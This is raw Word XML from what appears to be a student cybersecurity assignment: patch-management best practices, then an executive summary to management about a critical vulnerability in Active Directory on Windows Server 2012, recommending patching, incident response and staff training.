    <w:p w14:paraId="1EB75853"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3. Regularly Monitor Vendor Notifications: Stay informed about software vulnerabilities and security patches by monitoring vendor notifications, security advisories, and industry sources. Subscribe to vendor mailing lists, security forums, and vulnerability databases to receive timely updates about new patches and vulnerabilities that may affect your software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC43B9F" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553029F0"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lastRenderedPageBreak/>
        <w:t>4. Establish a Vulnerability Management Process: Implement a vulnerability management process that includes regular vulnerability scanning and assessment. Use automated vulnerability scanning tools like Nessus, OpenVAS, or Qualys to identify vulnerable software versions and prioritize patching based on the severity of the vulnerabilities discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C5BAAC" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43973432"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5. Test Patches in a Controlled Environment: Before deploying patches to production systems, perform thorough testing in a controlled environment. Set up a testing environment that closely resembles your production environment and assess the impact of the patches on system functionality, performance, and compatibility with existing software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA4898" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777FAE4E"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6. Implement Patch Deployment Automation: Utilize patch deployment automation tools or software distribution systems to streamline and expedite the patching process. These tools can help schedule and automate patch deployment, ensuring that updates are consistently applied to all relevant systems within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784EE44A" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0598D1C3"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7. Prioritize Critical and High-Impact Patches: Assess the criticality and impact of patches based on severity ratings, vendor recommendations, and potential exploitation risks. Prioritize the deployment of critical and high-impact patches that address vulnerabilities with a higher risk of exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3E873" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE96FF9"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8. Maintain Regular Maintenance Windows: Establish regular maintenance windows to apply software updates and security patches to production systems. These windows should be planned and communicated in advance to minimize disruption to operations and ensure that patches are deployed within a reasonable timeframe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48798863" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79720B23"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9. Implement Change Management Processes: Integrate the patching process into the organization's change management practices. Document patch implementation as a change request, track patching activities, and ensure appropriate approvals are obtained before deploying patches to production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722415E" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68326C2B" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA0F98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>10. Continuously Monitor and Audit Patch Compliance: Regularly monitor the patch compliance status of systems within the organization. Use monitoring and auditing tools to verify that patches have been applied correctly and promptly address any non-compliant systems. Ongoing monitoring helps identify any gaps in the patch management process and ensures that systems remain protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB2E0D" w14:textId="22759625" w:rsidR="000642AC" w:rsidRDefault="000B4619" w:rsidP="000B4619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Write a</w:t>
      </w:r>
      <w:r w:rsidR="000642AC" w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> four-paragraph executive summary written to executive management providing a summary of findings, risk impact to the IT asset and organization, and recommendations for next steps</w:t>
      </w:r>
      <w:r w:rsidR="007F751D" w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F085B2" w14:textId="10A82BEE" w:rsidR="00B715FC" w:rsidRDefault="00B715FC" w:rsidP="00B715FC">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B950CC" w14:textId="4A2A2B5D" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Bory The Shiba Institute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0780C378" w14:textId="1702B803"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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D78372" w14:textId="7365A5F8"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 xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>08/06/2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA96BC" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D5A0E9" w14:textId="77777777"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Subject: Summary of Findings, Risk Impact, and Recommendations for Vulnerability in Live System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558AD2CD" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C5D93D" w14:textId="77777777"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Dear Executive Management,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462BE009" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3EA22C" w14:textId="77777777"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I am writing to provide you with a summary of findings, risk impact to our IT assets and organization, and recommendations for next steps regarding a recently identified live vulnerability on one of our systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E030DA" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BEDDE2" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="0062064A" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062064A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D52F3E7" w14:textId="09802C00"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 xml:space="preserve">During a routine security assessment, our team discovered a critical vulnerability in the live system. The vulnerability exposes a potential entry point for unauthorized access and compromise of the system. Detailed analysis reveals that the vulnerability is present in the </w:t>
      </w:r>
      <w:r w:rsidR="00793F2B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ADDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, version </w:t>
      </w:r>
      <w:r w:rsidR="004B167F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows Server 2012</w:t>
      </w:r>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. The vulnerability allows remote attackers to execute arbitrary code and gain full control of the affected system. It is important to note that this vulnerability is actively exploited in the wild.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2263C5BA" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A53E1E" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="0062064A" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062064A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D0507" w14:textId="77777777"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The risk impact of this vulnerability is significant and could lead to severe consequences for our organization. If exploited, attackers can gain unauthorized access, compromise data integrity, and disrupt critical business operations. The potential impact includes unauthorized disclosure of sensitive information, financial losses, reputational damage, regulatory non-compliance, and potential legal liabilities. It is crucial that we address this vulnerability promptly to mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6A83E" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27315666" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="0062064A" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062064A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations for Next Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC54E8" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Patch and Update: Immediately apply the latest patch or security update provided by the software vendor to address the vulnerability. Our team has verified the availability of the patch, and it is essential that we expedite its deployment to the affected system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE2178D" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAE832C" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Incident Response: Activate our incident response plan to promptly assess the extent of any potential compromise and initiate necessary remediation actions. Engage our internal security team or consider partnering with a reputable external incident response service provider, if required, to ensure a thorough investigation and containment of any potential impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EAE7B4" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC7D17D" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Vulnerability Management Process: Review and enhance our vulnerability management process to prevent similar vulnerabilities from going unnoticed in the future. Implement regular vulnerability scanning and assessment, establish a patch management policy, and strengthen the collaboration between IT operations and security teams to ensure timely identification, prioritization, and remediation of vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC6DDE" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CFC619" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Security Awareness and Training: Reinforce security awareness and training programs for employees to educate them on the importance of promptly reporting vulnerabilities or suspicious activities. Foster a culture of security awareness throughout the organization to enhance our collective ability to identify and address potential risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF8EDD" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BD9095" w14:textId="6B806E76" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Taking immediate action to patch the vulnerability, initiating incident response measures, strengthening our vulnerability management process, and improving security awareness will significantly reduce the risk exposure and enhance our overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F43967C" w14:textId="770A9198" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We recommend allocating necessary resources, engaging relevant stakeholders, and prioritizing these recommendations to effectively mitigate the risks associated with the identified vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0E1A6" w14:textId="77777777"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Should you require further information or assistance, please do not hesitate to reach out to our security team. Thank you for your attention to this matter, and we look forward to your support in addressing this critical issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D658A" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFD1682" w14:textId="77777777" w:rsidR="00C93CC5" w:rsidRPr="00C93CC5" w:rsidRDefault="00C93CC5" w:rsidP="00C93CC5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93CC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Sincerely,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C686E13" w14:textId="77777777" w:rsidR="0062064A" w:rsidRDefault="0062064A" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Triet Tran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3933C0" w14:textId="6C419CF7" w:rsidR="00B715FC" w:rsidRDefault="0062064A" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Technical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5AE2B5" w14:textId="09810DDF" w:rsidR="0062064A" w:rsidRPr="00C93CC5" w:rsidRDefault="0062064A" w:rsidP="0062064A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Bory The Shiba</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0062064A" w:rsidRPr="00C93CC5" w:rsidSect="001E0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VNI-Goudy">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C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C7C2628"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0F93375C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F67C9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EF1288"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29BC7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06FBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0CE21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D33E06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CBC6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912731"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E90B3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4029694">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1519613462">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="134227955">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="768351885">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="815880952">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="446044500">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="18609228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4B3"/>
    <w:rsid w:val="00031B17"/>
    <w:rsid w:val="000642AC"/>
    <w:rsid w:val="000706B5"/>
    <w:rsid w:val="000B4619"/>
    <w:rsid w:val="000D685E"/>
    <w:rsid w:val="000D77CC"/>
    <w:rsid w:val="000F0E84"/>
    <w:rsid w:val="000F214A"/>
    <w:rsid w:val="00111849"/>
    <w:rsid w:val="00180EB9"/>
    <w:rsid w:val="001B2D8B"/>
    <w:rsid w:val="001E0E35"/>
    <w:rsid w:val="001E580E"/>
    <w:rsid w:val="001F301E"/>
    <w:rsid w:val="002600CB"/>
    <w:rsid w:val="002E6699"/>
    <w:rsid w:val="002E75CC"/>
    <w:rsid w:val="002F148D"/>
    <w:rsid w:val="00343A4D"/>
